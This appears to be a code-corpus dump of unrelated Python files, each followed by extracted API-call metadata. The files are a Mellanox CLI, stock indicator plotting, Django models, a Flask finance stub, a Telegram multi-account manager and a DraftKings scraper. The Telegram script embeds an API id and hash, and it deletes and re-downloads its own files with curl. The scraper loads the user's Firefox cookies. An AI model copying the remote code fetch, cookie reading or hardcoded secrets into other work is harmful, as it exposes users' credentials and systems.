| [((1414, 1458), 'selene.have.url', 'have.url', (['session_browser.driver.current_url'], {}), '(session_browser.driver.current_url)\n', (1422, 1458), False, 'from selene import have\n'), ((1487, 1539), 'selene.have.no.url', 'have.no.url', (['session_browser.driver.current_url[:-1]'], {}), '(session_browser.driver.current_url[:-1])\n', (1498, 1539), False, 'from selene import have\n'), ((1654, 1692), 'selene.have.url_containing', 'have.url_containing', (['"""start_page.html"""'], {}), "('start_page.html')\n", (1673, 1692), False, 'from selene import have\n'), ((1721, 1763), 'selene.have.no.url_containing', 'have.no.url_containing', (['"""start_page.xhtml"""'], {}), "('start_page.xhtml')\n", (1743, 1763), False, 'from selene import have\n'), ((1929, 1960), 'pytest.raises', 'pytest.raises', (['TimeoutException'], {}), '(TimeoutException)\n', (1942, 1960), False, 'import pytest\n'), ((2205, 2236), 'pytest.raises', 'pytest.raises', (['TimeoutException'], {}), '(TimeoutException)\n', (2218, 2236), False, 'import pytest\n'), ((1251, 1276), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (1266, 1276), False, 'import os\n'), ((1985, 2003), 'selene.have.url', 'have.url', (['"""xttp:/"""'], {}), "('xttp:/')\n", (1993, 2003), False, 'from selene import have\n'), ((2261, 2290), 'selene.have.url_containing', 'have.url_containing', (['"""xttp:/"""'], {}), "('xttp:/')\n", (2280, 2290), False, 'from selene import have\n')] |
#!/usr/bin/python
# Copyright 2013 Mellanox Technologies, Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import sys
from networking_mlnx.eswitchd.cli import conn_utils
from networking_mlnx.eswitchd.cli import exceptions
client = conn_utils.ConnUtil()
def parse():
"""Main method that manages supported CLI commands.
The actions that are supported throught the CLI are:
write-sys, del-port, allocate-port and add-port
Each action is matched with method that should handle it
e.g. write-sys action is matched with write_sys method
"""
parser = argparse.ArgumentParser(prog='ebrctl')
parser.add_argument('action', action='store_true')
parent_parser = argparse.ArgumentParser(add_help=False)
parent_parser.add_argument('vnic_mac')
parent_parser.add_argument('device_id')
parent_parser.add_argument('fabric')
parent_parser.add_argument('vnic_type')
subparsers = parser.add_subparsers()
parser_add_port = subparsers.add_parser('add-port',
parents=[parent_parser])
parser_add_port.add_argument('dev_name')
parser_add_port.set_defaults(func=add_port)
parser_add_port = subparsers.add_parser('allocate-port',
parents=[parent_parser])
parser_add_port.set_defaults(func=allocate_port)
parser_del_port = subparsers.add_parser('del-port')
parser_del_port.set_defaults(func=del_port)
parser_del_port.add_argument('fabric')
parser_del_port.add_argument('vnic_mac')
parser_write_sys = subparsers.add_parser('write-sys')
parser_write_sys.set_defaults(func=write_sys)
parser_write_sys.add_argument('path')
parser_write_sys.add_argument('value')
args = parser.parse_args()
args.func(args)
def allocate_port(args):
try:
dev = client.allocate_nic(args.vnic_mac, args.device_id,
args.fabric, args.vnic_type)
except exceptions.MlxException as e:
sys.stderr.write("Error in allocate command")
sys.stderr.write(e.message)
sys.exit(1)
sys.stdout.write(dev)
sys.exit(0)
def add_port(args):
try:
dev = client.plug_nic(args.vnic_mac, args.device_id, args.fabric,
args.vnic_type, args.dev_name)
except exceptions.MlxException as e:
sys.stderr.write("Error in add-port command")
sys.stderr.write(e.message)
sys.exit(1)
sys.stdout.write(dev)
sys.exit(0)
def del_port(args):
try:
client.deallocate_nic(args.vnic_mac, args.fabric)
except exceptions.MlxException as e:
sys.stderr.write("Error in del-port command")
sys.stderr.write(e.message)
sys.exit(1)
sys.exit(0)
def write_sys(args):
try:
fd = open(args.path, 'w')
fd.write(args.value)
fd.close()
except Exception as e:
sys.stderr.write("Error in write-sys command")
sys.stderr.write(e.message)
sys.exit(1)
sys.exit(0)
def main():
parse()
| [
"argparse.ArgumentParser",
"networking_mlnx.eswitchd.cli.conn_utils.ConnUtil",
"sys.stderr.write",
"sys.exit",
"sys.stdout.write"
]
| [((752, 773), 'networking_mlnx.eswitchd.cli.conn_utils.ConnUtil', 'conn_utils.ConnUtil', ([], {}), '()\n', (771, 773), False, 'from networking_mlnx.eswitchd.cli import conn_utils\n'), ((1098, 1136), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'prog': '"""ebrctl"""'}), "(prog='ebrctl')\n", (1121, 1136), False, 'import argparse\n'), ((1213, 1252), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'add_help': '(False)'}), '(add_help=False)\n', (1236, 1252), False, 'import argparse\n'), ((2627, 2648), 'sys.stdout.write', 'sys.stdout.write', (['dev'], {}), '(dev)\n', (2643, 2648), False, 'import sys\n'), ((2653, 2664), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (2661, 2664), False, 'import sys\n'), ((2987, 3008), 'sys.stdout.write', 'sys.stdout.write', (['dev'], {}), '(dev)\n', (3003, 3008), False, 'import sys\n'), ((3013, 3024), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (3021, 3024), False, 'import sys\n'), ((3269, 3280), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (3277, 3280), False, 'import sys\n'), ((3537, 3548), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (3545, 3548), False, 'import sys\n'), ((2521, 2566), 'sys.stderr.write', 'sys.stderr.write', (['"""Error in allocate command"""'], {}), "('Error in allocate command')\n", (2537, 2566), False, 'import sys\n'), ((2575, 2602), 'sys.stderr.write', 'sys.stderr.write', (['e.message'], {}), '(e.message)\n', (2591, 2602), False, 'import sys\n'), ((2611, 2622), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (2619, 2622), False, 'import sys\n'), ((2881, 2926), 'sys.stderr.write', 'sys.stderr.write', (['"""Error in add-port command"""'], {}), "('Error in add-port command')\n", (2897, 2926), False, 'import sys\n'), ((2935, 2962), 'sys.stderr.write', 'sys.stderr.write', (['e.message'], {}), '(e.message)\n', (2951, 2962), False, 'import sys\n'), ((2971, 2982), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (2979, 2982), False, 'import sys\n'), ((3163, 3208), 'sys.stderr.write', 'sys.stderr.write', (['"""Error in del-port command"""'], {}), "('Error in del-port command')\n", (3179, 3208), False, 'import sys\n'), ((3217, 3244), 'sys.stderr.write', 'sys.stderr.write', (['e.message'], {}), '(e.message)\n', (3233, 3244), False, 'import sys\n'), ((3253, 3264), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (3261, 3264), False, 'import sys\n'), ((3430, 3476), 'sys.stderr.write', 'sys.stderr.write', (['"""Error in write-sys command"""'], {}), "('Error in write-sys command')\n", (3446, 3476), False, 'import sys\n'), ((3485, 3512), 'sys.stderr.write', 'sys.stderr.write', (['e.message'], {}), '(e.message)\n', (3501, 3512), False, 'import sys\n'), ((3521, 3532), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (3529, 3532), False, 'import sys\n')] |
from typing import List, Union
import numpy as np
import pandas_datareader as pdr
import pandas as pd
import matplotlib.pyplot as plt
def rsi(symbol :str ,name :str, date :str) -> None :
"""
Calculates and visualises the Relative Stock Index on a Stock of the company.
Parameters:
symbol(str) : Symbol of the company from https://in.finance.yahoo.com/
name(str) : Name of the company
date(str) : start date of historical data in the format (YYYY,M,D)
Returns:
Return type: void
Example:
rsi('GOOG','Google','2020,01,01')
"""
ticker : str = pdr.get_data_yahoo(symbol, date)
delta : List[float] = ticker['Close'].diff()
up : int = delta.clip(lower=0)
down : int = -1*delta.clip(upper=0)
ema_up : Union[bool,float]= up.ewm(com=13, adjust=False).mean()
ema_down : Union[bool,float] = down.ewm(com=13, adjust=False).mean()
rs : float = ema_up/ema_down
ticker['RSI'] = 100 - (100/(1 + rs))
ticker : list = ticker.iloc[14:]
print(ticker)
fig, (ax1, ax2) = plt.subplots(2)
ax1.get_xaxis().set_visible(False)
fig.suptitle(name)
ticker['Close'].plot(ax=ax1)
ax1.set_ylabel('Price ($)')
ticker['RSI'].plot(ax=ax2)
ax2.set_ylim(0,100)
ax2.axhline(30, color='r', linestyle='--')
ax2.axhline(70, color='r', linestyle='--')
ax2.set_ylabel('RSI')
plt.show()
def volatility(symbol :str, date :str) ->None:
"""
Measures and visualizes the Volatility of a Stock by calculating the Average True Range(ATR)
Parameters:
symbol(str) : Symbol of the company from https://in.finance.yahoo.com/
date(str) : start date of historical data in the format (YYYY,M,D)
Returns:
Return type: void
Example:
volatility('GOOG','2020,01,01')
"""
data : str = pdr.get_data_yahoo(symbol,date)
data.head()
high_low : Union[int,float]= data['High'] - data['Low']
high_cp : List[float] = np.abs(data['High'] - data['Close'].shift())
low_cp : List[float]= np.abs(data['Low'] - data['Close'].shift())
df : List[str] = pd.concat([high_low, high_cp, low_cp], axis=1)
true_range : float= np.max(df, axis=1)
average_true_range : float= true_range.rolling(14).mean()
average_true_range
true_range.rolling(14).sum()/14
fig, ax = plt.subplots()
average_true_range.plot(ax=ax)
ax2 : Union[bool,float]= data['Close'].plot(ax=ax, secondary_y=True, alpha=.3)
ax.set_ylabel("ATR")
ax2.set_ylabel("Price")
plt.show() | [
"pandas_datareader.get_data_yahoo",
"numpy.max",
"pandas.concat",
"matplotlib.pyplot.subplots",
"matplotlib.pyplot.show"
]
| [((620, 652), 'pandas_datareader.get_data_yahoo', 'pdr.get_data_yahoo', (['symbol', 'date'], {}), '(symbol, date)\n', (638, 652), True, 'import pandas_datareader as pdr\n'), ((1072, 1087), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(2)'], {}), '(2)\n', (1084, 1087), True, 'import matplotlib.pyplot as plt\n'), ((1394, 1404), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1402, 1404), True, 'import matplotlib.pyplot as plt\n'), ((1865, 1897), 'pandas_datareader.get_data_yahoo', 'pdr.get_data_yahoo', (['symbol', 'date'], {}), '(symbol, date)\n', (1883, 1897), True, 'import pandas_datareader as pdr\n'), ((2137, 2183), 'pandas.concat', 'pd.concat', (['[high_low, high_cp, low_cp]'], {'axis': '(1)'}), '([high_low, high_cp, low_cp], axis=1)\n', (2146, 2183), True, 'import pandas as pd\n'), ((2208, 2226), 'numpy.max', 'np.max', (['df'], {'axis': '(1)'}), '(df, axis=1)\n', (2214, 2226), True, 'import numpy as np\n'), ((2367, 2381), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (2379, 2381), True, 'import matplotlib.pyplot as plt\n'), ((2557, 2567), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2565, 2567), True, 'import matplotlib.pyplot as plt\n')] |
from django.db import models
class Room(models.Model):
code = models.CharField('Code', max_length=128)
tab_url = models.CharField('Tab url', max_length=512, default='', blank=True)
def to_dict(self):
return {
'users': [u.to_dict() for u in self.users.all()],
'tabUrl': self.tab_url
}
def __str__(self):
return f'Room {self.code}'
class RoomUser(models.Model):
room = models.ForeignKey(Room, related_name='users', on_delete=models.CASCADE)
username = models.CharField('Username', max_length=128, default="user")
host = models.BooleanField('Is host')
def to_dict(self):
return {
'id': self.id,
'username': self.username,
'isHost': self.host,
}
def __str__(self):
return f'{self.username} ({self.id})'
| [
"django.db.models.CharField",
"django.db.models.BooleanField",
"django.db.models.ForeignKey"
]
| [((68, 108), 'django.db.models.CharField', 'models.CharField', (['"""Code"""'], {'max_length': '(128)'}), "('Code', max_length=128)\n", (84, 108), False, 'from django.db import models\n'), ((123, 190), 'django.db.models.CharField', 'models.CharField', (['"""Tab url"""'], {'max_length': '(512)', 'default': '""""""', 'blank': '(True)'}), "('Tab url', max_length=512, default='', blank=True)\n", (139, 190), False, 'from django.db import models\n'), ((441, 512), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Room'], {'related_name': '"""users"""', 'on_delete': 'models.CASCADE'}), "(Room, related_name='users', on_delete=models.CASCADE)\n", (458, 512), False, 'from django.db import models\n'), ((529, 589), 'django.db.models.CharField', 'models.CharField', (['"""Username"""'], {'max_length': '(128)', 'default': '"""user"""'}), "('Username', max_length=128, default='user')\n", (545, 589), False, 'from django.db import models\n'), ((601, 631), 'django.db.models.BooleanField', 'models.BooleanField', (['"""Is host"""'], {}), "('Is host')\n", (620, 631), False, 'from django.db import models\n')] |
import torch
DEVICE = torch.device("cuda")
SAVED_CHECKPOINTS = [32*1000, 100*1000, 150*1000, 200*1000, 300*1000, 400*1000]
SAVED_CHECKPOINTS += [10*1000, 20*1000, 30*1000, 40*1000, 50*1000, 60*1000, 70*1000, 80*1000, 90*1000]
SAVED_CHECKPOINTS += [25*1000, 50*1000, 75*1000]
SAVED_CHECKPOINTS = set(SAVED_CHECKPOINTS)
| [
"torch.device"
]
| [((23, 43), 'torch.device', 'torch.device', (['"""cuda"""'], {}), "('cuda')\n", (35, 43), False, 'import torch\n')] |
import os
from cs50 import SQL
from flask import Flask, flash, redirect, render_template, request, session
from flask_session import Session
from tempfile import mkdtemp
from werkzeug.exceptions import default_exceptions, HTTPException, InternalServerError
from werkzeug.security import check_password_hash, generate_password_hash
from helpers import apology, login_required, lookup, usd
# Configure application
app = Flask(__name__)
# Ensure templates are auto-reloaded
app.config["TEMPLATES_AUTO_RELOAD"] = True
# Ensure responses aren't cached
@app.after_request
def after_request(response):
response.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
response.headers["Expires"] = 0
response.headers["Pragma"] = "no-cache"
return response
# Custom filter
app.jinja_env.filters["usd"] = usd
# Configure session to use filesystem (instead of signed cookies)
app.config["SESSION_FILE_DIR"] = mkdtemp()
app.config["SESSION_PERMANENT"] = False
app.config["SESSION_TYPE"] = "filesystem"
Session(app)
# Configure CS50 Library to use SQLite database
db = SQL("sqlite:///finance.db")
# Make sure API key is set
if not os.environ.get("API_KEY"):
raise RuntimeError("API_KEY not set")
@app.route("/")
@login_required
def index():
"""Show portfolio of stocks"""
return apology("TODO")
@app.route("/buy", methods=["GET", "POST"])
@login_required
def buy():
"""Buy shares of stock"""
return apology("TODO")
@app.route("/history")
@login_required
def history():
"""Show history of transactions"""
return apology("TODO")
@app.route("/login", methods=["GET", "POST"])
def login():
"""Log user in"""
# Forget any user_id
session.clear()
# User reached route via POST (as by submitting a form via POST)
if request.method == "POST":
# Ensure username was submitted
if not request.form.get("username"):
return apology("must provide username", 403)
# Ensure password was submitted
elif not request.form.get("password"):
return apology("must provide password", 403)
# Query database for username
rows = db.execute("SELECT * FROM users WHERE username = ?", request.form.get("username"))
# Ensure username exists and password is correct
if len(rows) != 1 or not check_password_hash(rows[0]["hash"], request.form.get("password")):
return apology("invalid username and/or password", 403)
# Remember which user has logged in
session["user_id"] = rows[0]["id"]
# Redirect user to home page
return redirect("/")
# User reached route via GET (as by clicking a link or via redirect)
else:
return render_template("login.html")
@app.route("/logout")
def logout():
"""Log user out"""
# Forget any user_id
session.clear()
# Redirect user to login form
return redirect("/")
@app.route("/quote", methods=["GET", "POST"])
@login_required
def quote():
"""Get stock quote."""
return apology("TODO")
@app.route("/register", methods=["GET", "POST"])
def register():
"""Register user"""
return apology("TODO")
@app.route("/sell", methods=["GET", "POST"])
@login_required
def sell():
"""Sell shares of stock"""
return apology("TODO")
def errorhandler(e):
"""Handle error"""
if not isinstance(e, HTTPException):
e = InternalServerError()
return apology(e.name, e.code)
# Listen for errors
for code in default_exceptions:
app.errorhandler(code)(errorhandler)
| [
"flask.render_template",
"flask.Flask",
"cs50.SQL",
"os.environ.get",
"flask_session.Session",
"werkzeug.exceptions.InternalServerError",
"flask.redirect",
"helpers.apology",
"flask.request.form.get",
"tempfile.mkdtemp",
"flask.session.clear"
]
| [((421, 436), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (426, 436), False, 'from flask import Flask, flash, redirect, render_template, request, session\n'), ((932, 941), 'tempfile.mkdtemp', 'mkdtemp', ([], {}), '()\n', (939, 941), False, 'from tempfile import mkdtemp\n'), ((1024, 1036), 'flask_session.Session', 'Session', (['app'], {}), '(app)\n', (1031, 1036), False, 'from flask_session import Session\n'), ((1091, 1118), 'cs50.SQL', 'SQL', (['"""sqlite:///finance.db"""'], {}), "('sqlite:///finance.db')\n", (1094, 1118), False, 'from cs50 import SQL\n'), ((1154, 1179), 'os.environ.get', 'os.environ.get', (['"""API_KEY"""'], {}), "('API_KEY')\n", (1168, 1179), False, 'import os\n'), ((1316, 1331), 'helpers.apology', 'apology', (['"""TODO"""'], {}), "('TODO')\n", (1323, 1331), False, 'from helpers import apology, login_required, lookup, usd\n'), ((1446, 1461), 'helpers.apology', 'apology', (['"""TODO"""'], {}), "('TODO')\n", (1453, 1461), False, 'from helpers import apology, login_required, lookup, usd\n'), ((1568, 1583), 'helpers.apology', 'apology', (['"""TODO"""'], {}), "('TODO')\n", (1575, 1583), False, 'from helpers import apology, login_required, lookup, usd\n'), ((1697, 1712), 'flask.session.clear', 'session.clear', ([], {}), '()\n', (1710, 1712), False, 'from flask import Flask, flash, redirect, render_template, request, session\n'), ((2843, 2858), 'flask.session.clear', 'session.clear', ([], {}), '()\n', (2856, 2858), False, 'from flask import Flask, flash, redirect, render_template, request, session\n'), ((2905, 2918), 'flask.redirect', 'redirect', (['"""/"""'], {}), "('/')\n", (2913, 2918), False, 'from flask import Flask, flash, redirect, render_template, request, session\n'), ((3034, 3049), 'helpers.apology', 'apology', (['"""TODO"""'], {}), "('TODO')\n", (3041, 3049), False, 'from helpers import apology, login_required, lookup, usd\n'), ((3152, 3167), 'helpers.apology', 'apology', (['"""TODO"""'], {}), "('TODO')\n", (3159, 3167), False, 'from helpers import apology, login_required, lookup, usd\n'), ((3285, 3300), 'helpers.apology', 'apology', (['"""TODO"""'], {}), "('TODO')\n", (3292, 3300), False, 'from helpers import apology, login_required, lookup, usd\n'), ((3433, 3456), 'helpers.apology', 'apology', (['e.name', 'e.code'], {}), '(e.name, e.code)\n', (3440, 3456), False, 'from helpers import apology, login_required, lookup, usd\n'), ((2609, 2622), 'flask.redirect', 'redirect', (['"""/"""'], {}), "('/')\n", (2617, 2622), False, 'from flask import Flask, flash, redirect, render_template, request, session\n'), ((2722, 2751), 'flask.render_template', 'render_template', (['"""login.html"""'], {}), "('login.html')\n", (2737, 2751), False, 'from flask import Flask, flash, redirect, render_template, request, session\n'), ((3400, 3421), 'werkzeug.exceptions.InternalServerError', 'InternalServerError', ([], {}), '()\n', (3419, 3421), False, 'from werkzeug.exceptions import default_exceptions, HTTPException, InternalServerError\n'), ((1872, 1900), 'flask.request.form.get', 'request.form.get', (['"""username"""'], {}), "('username')\n", (1888, 1900), False, 'from flask import Flask, flash, redirect, render_template, request, session\n'), ((1921, 1958), 'helpers.apology', 'apology', (['"""must provide username"""', '(403)'], {}), "('must provide username', 403)\n", (1928, 1958), False, 'from helpers import apology, login_required, lookup, usd\n'), ((2211, 2239), 'flask.request.form.get', 'request.form.get', (['"""username"""'], {}), "('username')\n", (2227, 2239), False, 'from flask import Flask, flash, redirect, render_template, request, session\n'), ((2419, 2467), 'helpers.apology', 'apology', (['"""invalid username and/or password"""', '(403)'], {}), "('invalid username and/or password', 403)\n", (2426, 2467), False, 'from helpers import apology, login_required, lookup, usd\n'), ((2017, 2045), 'flask.request.form.get', 'request.form.get', (['"""password"""'], {}), "('password')\n", (2033, 2045), False, 'from flask import Flask, flash, redirect, render_template, request, session\n'), ((2066, 2103), 'helpers.apology', 'apology', (['"""must provide password"""', '(403)'], {}), "('must provide password', 403)\n", (2073, 2103), False, 'from helpers import apology, login_required, lookup, usd\n'), ((2369, 2397), 'flask.request.form.get', 'request.form.get', (['"""password"""'], {}), "('password')\n", (2385, 2397), False, 'from flask import Flask, flash, redirect, render_template, request, session\n')] |
from telethon.sync import TelegramClient
from telethon.errors.rpcerrorlist import PhoneNumberBannedError
import pickle, os
from colorama import init, Fore
from time import sleep
init()
n = Fore.RESET
lg = Fore.LIGHTGREEN_EX
r = Fore.RED
w = Fore.WHITE
cy = Fore.CYAN
ye = Fore.YELLOW
colors = [lg, r, w, cy, ye]
try:
import requests
except ImportError:
print(f'{lg}[i] Installing module - requests...{n}')
os.system('pip install requests')
def banner():
import random
# fancy logo
b = [
' _____ __',
' / _ \ _______/ |_____________',
' / /_\ \ / ___/\ __\_ __ \__ \\',
'/ | \ \___ \ | | | | \// __ \_',
'\____|__ /____ > |__| |__| (____ /',
' \/ \/ \/'
]
for char in b:
print(f'{random.choice(colors)}{char}{n}')
#print('=============SON OF GENISYS==============')
print(f' Version: 1.2 | Author: Cryptonian{n}\n')
def clr():
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
while True:
clr()
banner()
print(lg+'[1] Add new accounts'+n)
print(lg+'[2] Filter all banned accounts'+n)
print(lg+'[3] Delete specific accounts'+n)
print(lg+'[4] Update your Astra'+n)
print(lg+'[5] Quit'+n)
a = int(input('\nEnter your choice: '))
if a == 1:
new_accs = []
with open('vars.txt', 'ab') as g:
number_to_add = int(input(f'\n{lg} [~] Enter number of accounts to add: {r}'))
for i in range(number_to_add):
phone_number = str(input(f'\n{lg} [~] Enter Phone Number: {r}'))
parsed_number = ''.join(phone_number.split())
pickle.dump([parsed_number], g)
new_accs.append(parsed_number)
print(f'\n{lg} [i] Saved all accounts in vars.txt')
clr()
print(f'\n{lg} [*] Logging in from new accounts\n')
for number in new_accs:
c = TelegramClient(f'sessions/{number}', 3910389 , '86f861352f0ab76a251866059a6adbd6')
c.start(number)
print(f'{lg}[+] Login successful')
c.disconnect()
input(f'\n Press enter to goto main menu...')
g.close()
elif a == 2:
accounts = []
banned_accs = []
h = open('vars.txt', 'rb')
while True:
try:
accounts.append(pickle.load(h))
except EOFError:
break
h.close()
if len(accounts) == 0:
print(r+'[!] There are no accounts! Please add some and retry')
sleep(3)
else:
for account in accounts:
phone = str(account[0])
client = TelegramClient(f'sessions/{phone}', 3910389 , '86f861352f0ab76a251866059a6adbd6')
client.connect()
if not client.is_user_authorized():
try:
client.send_code_request(phone)
#client.sign_in(phone, input('[+] Enter the code: '))
print(f'{lg}[+] {phone} is not banned{n}')
except PhoneNumberBannedError:
print(r+str(phone) + ' is banned!'+n)
banned_accs.append(account)
if len(banned_accs) == 0:
print(lg+'Congrats! No banned accounts')
input('\nPress enter to goto main menu...')
else:
for m in banned_accs:
accounts.remove(m)
with open('vars.txt', 'wb') as k:
for a in accounts:
Phone = a[0]
pickle.dump([Phone], k)
k.close()
print(lg+'[i] All banned accounts removed'+n)
input('\nPress enter to goto main menu...')
elif a == 3:
accs = []
f = open('vars.txt', 'rb')
while True:
try:
accs.append(pickle.load(f))
except EOFError:
break
f.close()
i = 0
print(f'{lg}[i] Choose an account to delete\n')
for acc in accs:
print(f'{lg}[{i}] {acc[0]}{n}')
i += 1
index = int(input(f'\n{lg}[+] Enter a choice: {n}'))
phone = str(accs[index][0])
session_file = phone + '.session'
if os.name == 'nt':
os.system(f'del sessions\\{session_file}')
else:
os.system(f'rm sessions/{session_file}')
del accs[index]
f = open('vars.txt', 'wb')
for account in accs:
pickle.dump(account, f)
print(f'\n{lg}[+] Account Deleted{n}')
input(f'\nPress enter to goto main menu...')
f.close()
elif a == 4:
# thanks to github.com/th3unkn0n for the snippet below
print(f'\n{lg}[i] Checking for updates...')
try:
# https://raw.githubusercontent.com/Cryptonian007/Astra/main/version.txt
version = requests.get('https://raw.githubusercontent.com/Cryptonian007/Astra/main/version.txt')
except:
print(f'{r} You are not connected to the internet')
print(f'{r} Please connect to the internet and retry')
exit()
if float(version.text) > 1.1:
prompt = str(input(f'{lg}[~] Update available[Version {version.text}]. Download?[y/n]: {r}'))
if prompt == 'y' or prompt == 'yes' or prompt == 'Y':
print(f'{lg}[i] Downloading updates...')
if os.name == 'nt':
os.system('del add.py')
os.system('del manager.py')
else:
os.system('rm add.py')
os.system('rm manager.py')
#os.system('del scraper.py')
os.system('curl -l -O https://raw.githubusercontent.com/Cryptonian007/Astra/main/add.py')
os.system('curl -l -O https://raw.githubusercontent.com/Cryptonian007/Astra/main/manager.py')
print(f'{lg}[*] Updated to version: {version.text}')
input('Press enter to exit...')
exit()
else:
print(f'{lg}[!] Update aborted.')
input('Press enter to goto main menu...')
else:
print(f'{lg}[i] Your Astra is already up to date')
input('Press enter to goto main menu...')
elif a == 5:
clr()
banner()
exit()
| [
"random.choice",
"pickle.dump",
"pickle.load",
"time.sleep",
"requests.get",
"os.system",
"colorama.init",
"telethon.sync.TelegramClient"
]
| [((179, 185), 'colorama.init', 'init', ([], {}), '()\n', (183, 185), False, 'from colorama import init, Fore\n'), ((421, 454), 'os.system', 'os.system', (['"""pip install requests"""'], {}), "('pip install requests')\n", (430, 454), False, 'import pickle, os\n'), ((1014, 1030), 'os.system', 'os.system', (['"""cls"""'], {}), "('cls')\n", (1023, 1030), False, 'import pickle, os\n'), ((1049, 1067), 'os.system', 'os.system', (['"""clear"""'], {}), "('clear')\n", (1058, 1067), False, 'import pickle, os\n'), ((1722, 1753), 'pickle.dump', 'pickle.dump', (['[parsed_number]', 'g'], {}), '([parsed_number], g)\n', (1733, 1753), False, 'import pickle, os\n'), ((2003, 2088), 'telethon.sync.TelegramClient', 'TelegramClient', (['f"""sessions/{number}"""', '(3910389)', '"""86f861352f0ab76a251866059a6adbd6"""'], {}), "(f'sessions/{number}', 3910389,\n '86f861352f0ab76a251866059a6adbd6')\n", (2017, 2088), False, 'from telethon.sync import TelegramClient\n'), ((2649, 2657), 'time.sleep', 'sleep', (['(3)'], {}), '(3)\n', (2654, 2657), False, 'from time import sleep\n'), ((824, 845), 'random.choice', 'random.choice', (['colors'], {}), '(colors)\n', (837, 845), False, 'import random\n'), ((2774, 2859), 'telethon.sync.TelegramClient', 'TelegramClient', (['f"""sessions/{phone}"""', '(3910389)', '"""86f861352f0ab76a251866059a6adbd6"""'], {}), "(f'sessions/{phone}', 3910389, '86f861352f0ab76a251866059a6adbd6'\n )\n", (2788, 2859), False, 'from telethon.sync import TelegramClient\n'), ((4462, 4504), 'os.system', 'os.system', (['f"""del sessions\\\\{session_file}"""'], {}), "(f'del sessions\\\\{session_file}')\n", (4471, 4504), False, 'import pickle, os\n'), ((4531, 4571), 'os.system', 'os.system', (['f"""rm sessions/{session_file}"""'], {}), "(f'rm sessions/{session_file}')\n", (4540, 4571), False, 'import pickle, os\n'), ((4672, 4695), 'pickle.dump', 'pickle.dump', (['account', 'f'], {}), '(account, f)\n', (4683, 4695), False, 'import pickle, os\n'), ((2445, 2459), 'pickle.load', 'pickle.load', (['h'], {}), '(h)\n', (2456, 2459), False, 'import pickle, os\n'), ((5066, 5157), 'requests.get', 'requests.get', (['"""https://raw.githubusercontent.com/Cryptonian007/Astra/main/version.txt"""'], {}), "(\n 'https://raw.githubusercontent.com/Cryptonian007/Astra/main/version.txt')\n", (5078, 5157), False, 'import requests\n'), ((3732, 3755), 'pickle.dump', 'pickle.dump', (['[Phone]', 'k'], {}), '([Phone], k)\n', (3743, 3755), False, 'import pickle, os\n'), ((4040, 4054), 'pickle.load', 'pickle.load', (['f'], {}), '(f)\n', (4051, 4054), False, 'import pickle, os\n'), ((5887, 5986), 'os.system', 'os.system', (['"""curl -l -O https://raw.githubusercontent.com/Cryptonian007/Astra/main/add.py"""'], {}), "(\n 'curl -l -O https://raw.githubusercontent.com/Cryptonian007/Astra/main/add.py'\n )\n", (5896, 5986), False, 'import pickle, os\n'), ((5993, 6096), 'os.system', 'os.system', (['"""curl -l -O https://raw.githubusercontent.com/Cryptonian007/Astra/main/manager.py"""'], {}), "(\n 'curl -l -O https://raw.githubusercontent.com/Cryptonian007/Astra/main/manager.py'\n )\n", (6002, 6096), False, 'import pickle, os\n'), ((5642, 5665), 'os.system', 'os.system', (['"""del add.py"""'], {}), "('del add.py')\n", (5651, 5665), False, 'import pickle, os\n'), ((5686, 5713), 'os.system', 'os.system', (['"""del manager.py"""'], {}), "('del manager.py')\n", (5695, 5713), False, 'import pickle, os\n'), ((5756, 5778), 'os.system', 'os.system', (['"""rm add.py"""'], {}), "('rm add.py')\n", (5765, 5778), False, 'import pickle, os\n'), ((5799, 5825), 'os.system', 'os.system', (['"""rm manager.py"""'], {}), "('rm manager.py')\n", (5808, 5825), False, 'import pickle, os\n')] |
# dkhomeleague.py
import json
import logging
import os
from string import ascii_uppercase
import pandas as pd
from requests_html import HTMLSession
import browser_cookie3
import pdsheet
class Scraper:
"""scrapes league results"""
def __init__(self, league_key=None, username=None):
"""Creates instance
Args:
league_key (str): id for home league
username (str): your username
Returns:
Scraper
"""
logging.getLogger(__name__).addHandler(logging.NullHandler())
self.league_key = league_key if league_key else os.getenv('DK_LEAGUE_KEY')
self.username = username if username else os.getenv('DK_USERNAME')
self.s = HTMLSession()
self.s.headers.update({
'Connection': 'keep-alive',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36',
'DNT': '1',
'Accept': '*/*',
'Origin': 'https://www.draftkings.com',
'Sec-Fetch-Site': 'same-site',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Dest': 'empty',
'Referer': 'https://www.draftkings.com/',
'Accept-Language': 'en-US,en;q=0.9,ar;q=0.8',
})
self.cj = browser_cookie3.firefox()
@property
def api_url(self):
return 'https://api.draftkings.com/'
@property
def base_params(self):
return {'format': 'json'}
def _embed_params(self, embed_type):
return dict(**self.base_params, **{'embed': embed_type})
def contest_leaderboard(self, contest_id):
"""Gets contest leaderboard"""
url = self.api_url + f'scores/v1/megacontests/{contest_id}/leaderboard'
params = self._embed_params('leaderboard')
